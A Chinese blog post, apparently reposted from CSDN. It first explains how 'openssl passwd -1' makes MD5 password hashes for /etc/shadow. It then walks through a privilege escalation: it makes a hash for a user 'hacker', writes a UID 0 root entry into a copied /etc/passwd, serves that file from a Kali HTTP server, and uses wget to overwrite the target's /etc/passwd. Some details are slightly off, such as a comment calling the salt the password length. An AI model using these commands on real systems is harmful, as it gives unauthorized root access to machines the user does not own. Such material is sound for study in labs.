参考:https://www.cnblogs.com/liushuhe1990/articles/12298749.html

引言:

在Linux系统中我们要向手动生成一个密码可以采用opensll passwd来生成一个密码作为用户账号的密码。Linux系统中的密码存放在/etc/shadow文件中,并且是以加密的方式存放的,根据加密方式的不同,所产生的加密后的密码的位数也不同。

openssl passwd的作用是用来计算密码hash的,目的是为了防止密码以明文的形式出现。

语法格式:

openssl passwd [option] passwd

openssl passwd常用的选项如下:

-1:表示采用的是MD5加密算法。

-salt:指定salt值,不使用随机产生的salt。在使用加密算法进行加密时,即使密码一样,salt不一样,所计算出来的hash值也不一样,除非密码一样,salt值也一样,计算出来的hash值才一样。salt为8字节的字符串。

示例:

[tom@localhost ~]$ openssl passwd -1 -salt ‘12345678’ ##注意‘12345678’不是密码而是密码的长度

Password: ##这里输入的是密码

$1$12345678$1qWiC4czIc07B4J8bPjfC0 ##这是生成的密文密码

##将生成的密码串,手动添加到/etc/shadow中就可用作用户的登陆密码了。

passwd提权

1.通过OpenSSL passwd生成一个新的用户hacker,密码为123456

openssl passwd -1 -salt hacker 123456

$1$hacker$4o50Z4aoUGaLMC0Rg4Io40

2.将其追加到kali的/etc/passwd文件中

hacker:$1$hacker$4o50Z4aoUGaLMC0Rg4Io40:0:0:/root:/bin/bash追加到passwd中

3.在Kali上启动一个python服务器

python -m SimpleHTTPServer 8000

4.将Kali上的passwd文件下载到靶机etc目录下并覆盖原来的passwd文件

wget http://192.168.0.1/passwd -O /etc/passwd

5.然后切换到hacker用户即可


版权声明:本文为qq_50854790原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
原文链接:https://blog.csdn.net/qq_50854790/article/details/122769363